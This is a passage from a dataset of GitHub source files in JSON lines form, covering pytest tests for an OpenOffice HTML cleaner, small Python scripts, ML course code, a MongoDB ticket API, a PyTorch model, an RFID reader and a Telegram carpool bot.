workdir, samples_dir):\n # make sure we can get non-minified CSS if we wish so.\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n resultdir = os.path.dirname(resultpath)\n result_css = codecs.open(\n os.path.join(resultdir, 'sample.css'), 'r', 'utf-8').read()\n assert 'p{margin-bottom:.21cm}' in result_css\n\n def test_cleaner_invalid_minified(self):\n # The minified option must be true or false\n with pytest.raises(ArgumentParserError):\n CSSCleaner(options={'css-cleaner-min': 'nonsense'})\n\n def test_cleaner_prettify(self, workdir, samples_dir):\n # we can get prettified HTML from CSS cleaner\n # This might result in gaps in rendered output.\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner(options={'css-cleaner-prettify': '1'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n with codecs.open(resultpath, 'r', 'utf-8') as fd:\n result_html = fd.read()\n assert 'seam\\n \\n \\n less' in result_html\n\n def test_cleaner_non_prettify(self, workdir, samples_dir):\n # we can get non-prettified HTML from CSS cleaner\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner(options={'css-cleaner-prettify': '0'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False}, )\n with codecs.open(resultpath, 'r', 'utf-8') as fd:\n result_html = fd.read()\n assert 'seamless text.' in result_html\n\n def test_cleaner_non_prettify_is_default(self, workdir, samples_dir):\n # we get non-prettified HTML from CSS cleaner by default\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False}, )\n with codecs.open(resultpath, 'r', 'utf-8') as fd:\n result_html = fd.read()\n assert u'seamless text.' in result_html\n\n def test_non_html_ignored(self, workdir):\n # Non .html/.xhtml files are ignored\n proc = CSSCleaner()\n sample_path = workdir / \"src\" / \"sample.txt\"\n sample_path.write(\"Sample file.\")\n resultpath, metadata = proc.process(str(sample_path), {'error': False})\n # input was not touched\n assert resultpath == str(sample_path)\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in CSSCleaner.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {\n 'css_cleaner_minified': True,\n 'css_cleaner_prettify_html': False,\n }\n # explicitly set value (different from default)\n result = vars(parser.parse_args(\n [\n '-css-cleaner-min', 'no',\n '-css-cleaner-prettify', 'yes',\n ]))\n assert result == {\n 'css_cleaner_minified': False,\n 'css_cleaner_prettify_html': True,\n }\n\n def test_spaces_preserved_by_default(self, workdir, samples_dir):\n # we can be sure that any whitespaces are preserved (by default)\n samples_dir.join(\n \"sample-font-props.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n result_html = open(resultpath, 'r').read()\n assert \" sub\" in result_html # space before tag\n assert \"subscript\" in result_html # no space before tag\n assert \"subscript\" in result_html # no space after tag\n assert \"script parts\" in result_html # space after tag\n\n\nclass TestHTMLCleanerProcessor(object):\n\n def test_cleaner(self, workdir, samples_dir):\n # make sure erranous headings are fixed by default.\n samples_dir.join(\"sample3.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = HTMLCleaner()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', 'utf-8').read()\n u'1Häding1' in contents\n u'1.1Heading1.1' in contents\n u'1.2.Heading1.2.' in contents\n\n def test_option_fix_head_nums_true(self, samples_dir, workdir):\n # Make sure we respect the `fix_head_nums` option if true\n samples_dir.join(\"sample3.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = HTMLCleaner(\n options={\n 'html-cleaner-fix-head-nums': '1'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', 'utf-8').read()\n assert u'1Häding1' in contents\n\n def test_option_fix_head_nums_false(self, samples_dir, workdir):\n # Make sure we respect the `fix_head_nums` option if false.\n samples_dir.join(\"sample3.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = HTMLCleaner(\n options={\n 'html-cleaner-fix-head-nums': 'False'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', 'utf-8').read()\n assert u'1Häding1' not in contents\n\n def test_option_fix_img_links_false(self, samples_dir, workdir):\n # Make sure we respect the `fix_head_nums` option if true\n samples_dir.join(\"image_sample.html\").copy(\n workdir / \"src\" / \"sample.html\")\n samples_dir.join(\"image_sample_html_m20918026.gif\").copy(\n workdir / \"src\" / \"image_sample_html_m20918026.gif\")\n proc = HTMLCleaner(\n options={\n 'html-cleaner-fix-img-links': '0'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = open(resultpath, 'r').read()\n resultdir = os.path.dirname(resultpath)\n snippet = '' in contents\n\n def test_option_fix_sdfields_true(self, samples_dir, workdir):\n # Make sure we respect the `fix_sdtags` option if false\n samples_dir.join(\"sample3.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = HTMLCleaner(\n options={\n 'html-cleaner-fix-sd-fields': '1'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', 'utf-8').read()\n assert u'' not in contents\n\n def test_option_invalid(self):\n # Make sure we complain when trash is set as `fix_head_nums`.\n with pytest.raises(ArgumentParserError):\n HTMLCleaner(options={'html-cleaner-fix-head-nums': 'foo'})\n with pytest.raises(ArgumentParserError):\n HTMLCleaner(options={'html-cleaner-fix-img-links': 'foo'})\n with pytest.raises(ArgumentParserError):\n HTMLCleaner(options={'html-cleaner-fix-sdfields': 'foo'})\n\n def test_rename_img_files(self, samples_dir, workdir):\n # we can rename image files\n samples_dir.join(\"image_sample_html_m20918026.gif\").copy(\n workdir / \"src\" / \"image_sample_html_m20918026.gif\")\n proc = HTMLCleaner(\n options={'html-cleaner-fix-img-links': '1'})\n proc.rename_img_files(\n str(workdir / \"src\"),\n {'image_sample_html_m20918026.gif': 'sample_1.gif'}\n )\n list_dir = os.listdir(str(workdir / \"src\"))\n assert 'sample_1.gif' in list_dir\n assert 'image_sample_html_m20918026.gif' not in list_dir\n\n def test_rename_img_files_no_src(self, samples_dir, workdir):\n # We cope with not existing source files\n samples_dir.join(\"image_sample_html_m20918026.gif\").copy(\n workdir / \"src\" / \"image_sample_html_m20918026.gif\")\n proc = HTMLCleaner(\n options={'html-cleaner-fix-img-links': '1'})\n proc.rename_img_files(\n str(workdir / \"src\"),\n {'not-existing-filename': 'sample_1.gif'}\n )\n list_dir = os.listdir(str(workdir / \"src\"))\n assert 'sample_1.gif' not in list_dir\n\n def test_rename_img_files_dst_exists_already(self, samples_dir, workdir):\n # We cope with dest files that already exist\n samples_dir.join(\"image_sample_html_m20918026.gif\").copy(\n workdir / \"src\" / \"image_sample_html_m20918026.gif\")\n proc = HTMLCleaner(\n options={'html-cleaner-fix-img-links': '1'})\n proc.rename_img_files(\n str(workdir / \"src\"),\n {\n 'image_sample_html_m20918026.gif':\n 'image_sample_html_m20918026.gif'\n }\n )\n list_dir = os.listdir(str(workdir / \"src\"))\n assert 'image_sample_html_m20918026.gif' in list_dir\n\n def test_rename_img_files_src_is_dir(self, workdir):\n # We cope with src files that are in fact dirs\n proc = HTMLCleaner(\n options={'html-cleaner-fix-img-links': '1'})\n proc.rename_img_files(\n str(workdir), {'src': 'sample.jpg'})\n list_dir = os.listdir(str(workdir))\n assert 'sample.jpg' not in list_dir\n\n def test_non_html_ignored(self, workdir):\n # Non .html/.xhtml files are ignored\n proc = HTMLCleaner()\n sample_path = workdir / \"src\" / \"sample.txt\"\n resultpath, metadata = proc.process(\n str(sample_path), {'error': False})\n # input was not touched\n assert resultpath == str(sample_path)\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in HTMLCleaner.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {\n 'html_cleaner_fix_heading_numbers': True,\n 'html_cleaner_fix_image_links': True,\n 'html_cleaner_fix_sd_fields': True}\n # explicitly set value (different from default)\n result = vars(parser.parse_args([\n '-html-cleaner-fix-head-nums', '0',\n '-html-cleaner-fix-img-links', 'false',\n '-html-cleaner-fix-sd-fields', 'No']))\n assert result == {\n 'html_cleaner_fix_heading_numbers': False,\n 'html_cleaner_fix_image_links': False,\n 'html_cleaner_fix_sd_fields': False}\n\n\nclass TestErrorProcessor(object):\n\n def test_error(self):\n proc = Error()\n path, metadata = proc.process(None, {})\n assert path is None\n assert 'error-descr' in metadata.keys()\n","repo_name":"ulif/ulif.openoffice","sub_path":"tests/test_processor.py","file_name":"test_processor.py","file_ext":"py","file_size_in_byte":37165,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"31043251833","text":"from datetime import datetime\n\nfecha_nacimiento = input(\"Introduzca su fecha de nacimiento (dd/mm/aaaa): \")\nf_nac = datetime.strptime(fecha_nacimiento, \"%d/%m/%Y\")\nf_actual = datetime.now()\ndelta = f_actual - f_nac\nedad = delta.days // 365\nif edad >= 18:\n print(\"Usted es mayor de edad\")\nelse:\n print(\"Usted es menor de edad\")","repo_name":"jairochapela/rosetta","sub_path":"05-mayoria-de-edad/python/mayordeedad.py","file_name":"mayordeedad.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33062317420","text":"import os\ndef read_file(filename):\n\tlines = []\n\twith open(filename, 'r', encoding='utf-8') as f:\n\t\tfor line in f:\n\t\t\tlines.append(line.strip())\n\treturn lines\n\ndef convert(lines):\n\tnew = []\n\tperson = None\n\tfor line in lines:\n\t\tif line == 'Allen': #一個小系列\n\t\t\tperson = 'Allen'\n\t\t\tcontinue\n\t\telif line == 'Tom': #一個小系列\n\t\t\tperson = 'Tom'\n\t\t\tcontinue\n\t\tif person:\n\t\t\tnew.append(person + ':' + line)\n\treturn new\n\ndef write_file(filename, lines):\n\twith open(filename, 'w') as f:\n\t\tfor line in lines:\n\t\t\tf.write(line + '\\n')\n\ndef main():\n\tif os.path.isfile('conversation.txt'):\n\t\tprint('找到檔案!')\n\telse:\n\t\tprint('無法讀取檔案')\n\tlines = read_file('conversation.txt')\n\tfilename = 'conversation,txt'\n\tlines = convert(lines)\n\twrite_file('outcome.txt', lines) #輸出檔名\n\nmain()","repo_name":"NicholasChen2170/conversation_practice","sub_path":"conversation_practice.py","file_name":"conversation_practice.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23351261458","text":"import pandas as pd\nfrom sklearn.model_selection import KFold, cross_val_score\nfrom sklearn.ensemble import GradientBoostingClassifier\nimport datetime\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\n\n# Подход 1: градиентный бустинг \"в лоб\"\n\n# 1. Считайте таблицу с признаками из файла features.csv\n# Удалите признаки, связанные с итогами матча (они помечены в описании данных как отсутствующие в тестовой выборке)\ntrain = pd.read_csv(\"data/final/features.csv\", index_col=\"match_id\")\ntrain.drop([\n \"duration\",\n \"tower_status_radiant\",\n \"tower_status_dire\",\n \"barracks_status_radiant\",\n \"barracks_status_dire\",\n ], axis=1, inplace=True)\n\n\n# 2. Проверьте выборку на наличие пропусков с помощью функции count(),\n# которая для каждого столбца показывает число заполненных значений.\n# Много ли пропусков в данных? Запишите названия признаков, имеющих пропуски,\n# и попробуйте для любых двух из них дать обоснование, почему их значения могут быть пропущены.\ncount_na = len(train) - train.count()\npasses = count_na[count_na > 0].sort_values(ascending=False) / len(train)\n\n\n# 3. Замените пропуски на нули с помощью функции fillna()\ntrain.fillna(0, inplace=True)\n\n\n# 4. Какой столбец содержит целевую переменную?\n# Запишите его название.\nX_train = train.drop(\"radiant_win\", axis=1)\ny_train = train[\"radiant_win\"]\n\n\n# Обучене градиентного бустинга над деревьями на имеющейся матрице \"объекты-признаки\"\ncv = KFold(n_splits=5, shuffle=True, random_state=42)\n\n\ndef score_gb(X: pd.DataFrame, y: pd.Series) -> pd.Series:\n scores = {}\n\n for n_estimators in [10, 20, 30, 50, 100, 250]:\n print(f\"n_estimators={n_estimators}\")\n model = GradientBoostingClassifier(n_estimators=n_estimators, random_state=42)\n\n start_time = datetime.datetime.now()\n score = cross_val_score(model, X, y, cv=cv, scoring=\"roc_auc\", n_jobs=-1).mean()\n print(f\"Score: {score:.3f}\")\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\n\n scores[n_estimators] = score\n print()\n\n return pd.Series(scores)\n\n\n# scores = score_gb(X_train, y_train)\n\n\n# Подход 2: логистическая регрессия\n\n# 1. Оцените качество логистической регрессии (sklearn.linear_model.LogisticRegression с L2-регуляризацией)\n# с помощью кросс-валидации по той же схеме, которая использовалась для градиентного бустинга\n\nscaler = StandardScaler()\nX_train = pd.DataFrame(scaler.fit_transform(X_train), index=X_train.index, columns=X_train.columns)\n\n\ndef score_lr(X: pd.DataFrame, y: pd.Series) -> pd.Series:\n scores = {}\n\n for i in range(-5, 6):\n C = 10.0 ** i\n\n print(f\"C={C}\")\n model = LogisticRegression(solver='lbfgs', C=C, random_state=42)\n\n start_time = datetime.datetime.now()\n score = cross_val_score(model, X, y, cv=cv, scoring=\"roc_auc\", n_jobs=-1).mean()\n print(f\"Score: {score:.3f}\")\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\n\n scores[i] = score\n print()\n\n return pd.Series(scores)\n\n\nscores = score_lr(X_train, y_train)\n\n\ndef print_best_lr_score(scores: pd.Series):\n best_iteration = scores.sort_values(ascending=False).head(1)\n best_C = 10.0 ** best_iteration.index[0]\n best_score = best_iteration.values[0]\n\n print(f\"Наилучшее значение показателя AUC-ROC достигается при C = {best_C:.2f} и равно {best_score:.2f}.\")\n\n\nprint_best_lr_score(scores)\n\n\n# 2. Среди признаков в выборке есть категориальные,\n# которые мы использовали как числовые, что вряд ли является хорошей идеей\n\nhero_columns = [f\"r{i}_hero\" for i in range (1, 6)] + [f\"d{i}_hero\" for i in range (1, 6)]\ncat_columns = [\"lobby_type\"] + hero_columns\nX_train.drop(cat_columns, axis=1, inplace=True)\n\nscores = score_lr(X_train, y_train)\nprint_best_lr_score(scores)\n\n\n# 3. На предыдущем шаге мы исключили из выборки признаки rM_hero и dM_hero, которые показывают,\n# какие именно герои играли за каждую команду\n\nunique_heroes = np.unique(train[hero_columns].values.ravel())\nN = max(unique_heroes)\nprint(f\"Число уникальных героев в train: {len(unique_heroes)}. Максимальный ID героя: {N}.\")\n\n\n# 4. Воспользуемся подходом \"мешок слов\" для кодирования информации о героях\ndef get_pick(data: pd.DataFrame) -> pd.DataFrame:\n X_pick = np.zeros((data.shape[0], N))\n\n for i, match_id in enumerate(data.index):\n for p in range(1, 6):\n X_pick[i, data.loc[match_id, f\"r{p}_hero\"] - 1] = 1\n X_pick[i, data.loc[match_id, f\"d{p}_hero\"] - 1] = -1\n\n return pd.DataFrame(X_pick, index=data.index, columns=[f\"hero_{i}\" for i in range(N)])\n\n\nX_pick = get_pick(train)\nX_train = pd.concat([X_train, X_pick], axis=1)\n\n# 5. Проведите кросс-валидацию для логистической регрессии на новой выборке\n# с подбором лучшего параметра регуляризации\n\nscores = score_lr(X_train, y_train)\nprint_best_lr_score(scores)\n\n\n# 6. Постройте предсказания вероятностей победы команды Radiant для тестовой выборки\n# с помощью лучшей из изученных моделей (лучшей с точки зрения AUC-ROC на кросс-валидации)\n\nmodel = LogisticRegression(solver='lbfgs', C=0.1, random_state=42)\nmodel.fit(X_train, y_train)\n\ntest = pd.read_csv(\"data/final/features_test.csv\", index_col=\"match_id\")\ntest.fillna(0, inplace=True)\n\nX_test = pd.DataFrame(scaler.transform(test), index=test.index, columns=test.columns)\nX_test.drop(cat_columns, axis=1, inplace=True)\nX_test = pd.concat([X_test, get_pick(test)], axis=1)\n\npreds = pd.Series(model.predict_proba(X_test)[:, 1])\nprint(preds.describe())\n","repo_name":"Rom4e6/Machine-Learning-Yandex-intro","sub_path":"Machine Learning Yandex intro/Week_7/Others/Final_statement.py","file_name":"Final_statement.py","file_ext":"py","file_size_in_byte":6834,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29416291570","text":"import datetime\nimport Api.Main_Api as main_api\n\n\nclass Admin_Api(main_api.Api):\n\n def __init__(self):\n super().__init__()\n self.connector()\n\n def add_new_item(self, json_data):\n # Get Film_ID from json_data\n film_id = json_data[\"Film_ID\"]\n # Get ticket information from Film_ID in the collection\n ticket = self.warehouse_collection.find_one({'Film_ID': film_id})\n if ticket is None:\n # Check if the information in json_data is complete or not\n S = 0\n for key, value in json_data.items():\n if self.warehouse_collection.find_one({key: value}) is None:\n S += 1\n else:\n continue\n if S == 6: # (Film_ID, Film, Genre, Showtime, Price)\n # If all 6 pieces of information are available, add a new ticket to the database\n self.warehouse_collection.insert_one(json_data)\n return 0 # Success\n else:\n # Error: missing information\n return -1\n else:\n # Update the number of tickets in the database\n current_quantity = ticket[\"Stock\"]\n if current_quantity < 30:\n new_quantity = current_quantity + json_data[\"Stock\"]\n self.warehouse_collection.update_one(\n {'Film_ID': film_id}, {'$set': {'Stock': new_quantity}})\n return 0 # Success\n else:\n # Error: ticket quantity is full\n return -2\n\n def update_items(self, json_data, film_id):\n # Get ticket information from json_data\n ticket = self.warehouse_collection.find_one({'Film_ID': film_id})\n _id = ticket['_id'] # Get the ID of the ticket\n if 'Film_ID' in json_data:\n if self.warehouse_collection.find_one({'Film_ID': json_data['Film_ID']}) is not None:\n return -2 # Error: Film_ID already exists in the database\n updated_fields = {}\n if 'Showtime' in json_data:\n try:\n datetime.datetime.strptime(json_data['Showtime'], \"%Y/%m/%d\")\n updated_fields['Showtime'] = json_data['Showtime']\n except ValueError:\n return -3 # Error: Showtime format is incorrect\n if 'Film' in json_data:\n updated_fields['Film'] = json_data['Film']\n if 'Genre' in json_data:\n updated_fields['Genre'] = json_data['Genre']\n # Update the ticket information in the database\n if updated_fields:\n self.warehouse_collection.update_one({'Film_ID': film_id}, {'$set': updated_fields})\n return 0 # Update successful\n else:\n # No new information was updated\n return -1\n\n def remove_items(self, film_id):\n # Get ticket information from json_data\n ticket = self.warehouse_collection.find_one({'Film_ID': film_id})\n if ticket is None:\n # Error: ticket not found\n return -2\n elif ticket is not None:\n film_id = ticket['Film_ID'] # get id of ticket\n self.warehouse_collection.delete_one({'Film_ID': film_id})\n return 0 # success\n","repo_name":"thanhtyzz/group2","sub_path":"Api/Admin_Api.py","file_name":"Admin_Api.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"11011862870","text":"import torch \nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport model.CRUCell as CRUCell\n\nclass _CRU(nn.Module):\n \n def __init__(self, in_dim, hid_dim, out_dim, num_layers, bias = True):\n super(_CRU, self).__init__()\n \n self.in_dim = in_dim\n self.hid_dim = hid_dim\n self.num_layers = num_layers\n self.bias = bias\n self.out_dim = out_dim\n \n self.cell_list = nn.ModuleList()\n self.cell_list.append(CRUCell._CRUCell(self.in_dim,\n self.hid_dim, \n self.bias))\n for l in range(1, self.num_layers):\n self.cell_list.append(CRUCell._CRUCell(self.hid_dim,\n self.hid_dim,\n self.bias))\n\n self.fc = nn.Sequential(\n nn.Linear(self.hid_dim*self.num_layers, self.out_dim),\n nn.ELU()\n )\n\n if torch.cuda.is_available():\n self.device = torch.device('cuda')\n else:\n self.device = torch.device('cpu')\n \n\n def forward(self, input, hid_state=None):\n\n if hid_state is None:\n hid_state = Variable(torch.zeros(self.num_layers, 3, input.size(0), self.hid_dim)).cuda()\n else:\n hid_state = hid_state.to_device(self.device)\n\n outs = []\n\n hidden = list()\n for layer in range(self.num_layers):\n hidden.append(hid_state[layer,:, :, :])\n \n for t in range(input.size(1)):\n\n for layer in range(self.num_layers):\n\n if layer == 0:\n hid_layer = self.cell_list[layer](input[:, t, :], hidden[layer]).to_device(self.device)\n else:\n hid_layer = self.cell_list[layer](hidden[layer - 1],hidden[layer]).to_device(self.device)\n \n hidden[layer] = hid_layer\n\n outs.append(hid_layer)\n \n feature = torch.mean(outs[-1],axis=1)\n out = torch.sum(outs[-1],axis=0)\n out = self.fc(out)\n \n return out, feature","repo_name":"simsunghyun/CRU","sub_path":"model/CRU.py","file_name":"CRU.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"33342992019","text":"#!/usr/bin/python\n\"\"\"\nConfig getter module\n\"\"\"\nimport ConfigParser\nimport collections\nimport ast\n\ndef parse_dict(str_val):\n \"\"\"Parses dict str from .ini file.\n :str_val: str\n '{'key1':'val1'}\\n{'key2':'val2'}'\n :returns: dictionary\n {'key1':'val1', 'key2':'val2'}\n \"\"\"\n elem_list = {}\n current = {}\n elements = str_val.split()\n for elem in elements:\n current = ast.literal_eval(elem)\n key = current.keys()[0]\n val = current.values()[0]\n elem_list[key] = val\n return elem_list\n\ndef parse_dict_arr(str_val):\n \"\"\"Parses dict array str from .ini file.\n :str_val: str\n '{'key1':'val1'}\\n{'key2':'val2'}'\n :returns: arr\n contains dictionaries as follows\n [{'key1':'val1'}, {'key2':'val2'}]\n \"\"\"\n elem_arr = []\n elements = str_val.split()\n for elem in elements:\n elem_arr.append(ast.literal_eval(elem))\n return elem_arr\n\nclass Fconfig(object):\n\n \"\"\"Hard Coded Configuration Parser. \"\"\"\n\n def __init__(self, fname):\n \"\"\"initiate config file\n :fname: str\n file name of config file\n \"\"\"\n self._fname = fname\n\n def get_config(self, section_name):\n \"\"\"Gets configuration from given section in config.ini.\n :section_name: str\n Name of the section\n :returns: dict\n \"\"\"\n config_map = collections.OrderedDict()\n parser = ConfigParser.SafeConfigParser()\n parser.read(self._fname)\n\n for name, value in parser.items(section_name):\n config_map[name] = value\n\n return config_map\n\n def get_table_fields(self, table):\n \"\"\"get field list of table\n :table: str\n :returns: arr\n contains strings\n \"\"\"\n field_map = self.get_config('field_map')[table]\n field_map = field_map.split(',')\n field_info = self.get_config(field_map[0])[field_map[1]]\n field_info = parse_dict(field_info).keys()\n return field_info\n\n def get_db_name(self):\n \"\"\"get relative path of database\n :returns: str\n \"\"\"\n db_info = self.get_config('database')\n db_name = db_info['name']\n return db_name\n\n","repo_name":"kivanccakmak/plate_track","sub_path":"src/fconfig.py","file_name":"fconfig.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"285407234","text":"import serial\nimport logging\nimport traceback\n\n\nclass Rfid(object):\n def __init__(self):\n logging.basicConfig(level=logging.INFO)\n self.logger = logging.getLogger(__name__)\n self.logger.info('Starting...')\n self.port_rf = serial.Serial('/dev/serial0',115200)\n self.logger.info('Setup completed successfully !')\n\n def read(self):\n try:\n id = \"\"\n read_byte = self.port_rf.read()\n if read_byte == \"\\x02\":\n for bits in range(12):\n read_byte = self.port_rf.read()\n id += str(read_byte)\n self.logger.info(hex(ord(read_byte)))\n self.logger.info(id)\n except:\n self.logger.error('Unexpected error: ' + traceback.format_exc())\n raise\n","repo_name":"kevinmmartins/RFIDPipenv","sub_path":"Rfid.py","file_name":"Rfid.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"18793578260","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\nclass Tree:\n def dfs(self, root: Node):\n if root is None:\n return None\n left = self.dfs(root.left)\n right = self.dfs(root.right)\n\n #Exchange the nodes\n root.left = right\n root.right = left\n return root\n\n def invert_binary_tree(self, root: Node):\n if root is None:\n return None\n return self.dfs(root)\n \n\n# Example Binary tree:\n# 4\n# / \\\n# 2 7\n# / \\ \\\n# 1 3 6\nroot = Node(4)\nroot.left = Node(2)\nroot.right = Node(7)\nroot.left.left = Node(1)\nroot.left.right = Node(3)\nroot.right.right = Node(6)\n\n# Invert the tree (Time Complexity O(n))\nbinaryTree = Tree()\nroot = binaryTree.invert_binary_tree(root)\n\nprint(root.left.left.val) # 6 ","repo_name":"kunal9922/DSA_Archive","sub_path":"Trees/invertBinaryTree.py","file_name":"invertBinaryTree.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73965245240","text":"class Solution:\n def __init__(self):\n self.longest_path = 1\n \n def longestIncreasingPath(self, matrix: List[List[int]]) -> int:\n cache = [[1 for _ in range(len(matrix[0]))] for _ in range(len(matrix))]\n visited = set()\n for row in range(len(matrix)):\n for col in range(len(matrix[0])):\n self._longest_increasing_path(matrix, cache, (row, col))\n return self.longest_path\n \n def _longest_increasing_path(self, matrix, cache, vert):\n row, col = vert\n if cache[row][col] != 1:\n return cache[row][col]\n for n_row, n_col in [(row + 1, col), (row - 1, col), (row, col + 1), (row, col - 1)]:\n if 0 <= n_row < len(matrix) and 0 <= n_col < len(matrix[0]):\n if matrix[n_row][n_col] < matrix[row][col]:\n path = self._longest_increasing_path(matrix, cache, (n_row, n_col))\n cache[row][col] = max(cache[row][col], path + 1)\n if cache[row][col] > self.longest_path:\n self.longest_path = cache[row][col]\n return cache[row][col]\n \n","repo_name":"csusb-005411285/CodeBreakersCode","sub_path":"longest-increasing-path-in-a-matrix.py","file_name":"longest-increasing-path-in-a-matrix.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8843685211","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime, tzinfo\nimport re\n\nfrom django.conf import settings\nimport pytz\nfrom telegram import Update\nfrom telegram.ext import CallbackContext\n\nfrom carona_parque.bot.models import Car, Neighborhood, Ride, User, Zone\nfrom carona_parque.bot.utils import smart_split\n\n\nclass UserNotApproved(Exception):\n pass\n\n\ndef add_ride(update: Update, context: CallbackContext):\n # Get chat ID\n chat_id = update.effective_chat.id\n\n # Get user\n try:\n user: User = User.objects.get(telegram_chat_id=chat_id)\n if not user.approved:\n raise UserNotApproved()\n except User.DoesNotExist:\n # tell it's not registered\n update.message.reply_text(\n \"Você ainda não está cadastrado! 😓 Se deseja se cadastrar, digite `/cadastrar `\"\n )\n return\n except UserNotApproved:\n update.message.reply_text(\"Você ainda não está aprovado. Mas fique de olho! 🧐\")\n return\n\n # Get arguments (must be car_id, neighborhood_id, date, time, seats)\n args = context.args\n if len(args) != 6:\n update.message.reply_text(\n \"Você deve usar o comando `/adicionar_carona \"\n + \" `\" # noqa\n )\n return\n\n # Parse types\n try:\n car_id = int(args[0])\n except ValueError:\n update.message.reply_text(\"O id do carro deve ser um número inteiro.\")\n return\n try:\n neighborhood_id = int(args[1])\n except ValueError:\n update.message.reply_text(\"O id da vizinhança deve ser um número inteiro.\")\n return\n date = args[2]\n time = args[3]\n try:\n seats = int(args[4])\n except ValueError:\n update.message.reply_text(\"A quantidade de vagas deve ser um número inteiro.\")\n return\n try:\n price = float(args[5])\n except ValueError:\n update.message.reply_text(\"O preço deve ser um número real.\")\n return\n\n # Get car\n try:\n car: Car = Car.objects.get(id=car_id)\n assert car.user == user\n except Car.DoesNotExist:\n update.message.reply_text(\n \"Você não pode adicionar caronas carros que não são seus! \"\n + \"Para ver a lista de carros, use /carros.\" # noqa\n )\n return\n except AssertionError:\n update.message.reply_text(\n \"Você não pode adicionar caronas carros que não são seus! \"\n + \"Para ver a lista de carros, use /carros.\" # noqa\n )\n return\n\n # Get neighborhood\n try:\n neighborhood: Neighborhood = Neighborhood.objects.get(id=neighborhood_id)\n except Neighborhood.DoesNotExist:\n update.message.reply_text(\n \"A vizinhança especificada não existe. Use /vizinhancas para ver a \"\n + \"lista de vizinhancas.\" # noqa\n )\n return\n\n # Parse date (must be in format DD/MM/YYYY)\n try:\n date_parts = re.match(r\"(\\d{2})/(\\d{2})/(\\d{4})\", date).groups()\n date: datetime = datetime(\n int(date_parts[2]),\n int(date_parts[1]),\n int(date_parts[0]),\n tzinfo=pytz.timezone(settings.TIME_ZONE),\n )\n except AttributeError:\n update.message.reply_text(\"A data deve estar no formato DD/MM/YYYY\")\n\n # Parse time (must be in format HH:MM)\n try:\n time_parts = re.match(r\"(\\d{2}):(\\d{2})\", time).groups()\n date = date.replace(hour=int(time_parts[0]), minute=int(time_parts[1]))\n except AttributeError:\n update.message.reply_text(\"A hora deve estar no formato HH:MM\")\n\n # Assert that date is in the future\n if date < datetime.now(tz=pytz.timezone(settings.TIME_ZONE)):\n update.message.reply_text(\"A data deve ser no futuro!\")\n return\n\n # Create ride\n ride = Ride(\n car=car,\n destination=neighborhood,\n passenger_seats=seats,\n start_timestamp=date,\n price=price,\n )\n ride.save()\n\n # Send message\n update.message.reply_text(\"Carona adicionada com sucesso! 🎉\")\n\n\ndef list_rides(update: Update, context: CallbackContext):\n # Get chat ID\n chat_id = update.effective_chat.id\n\n # 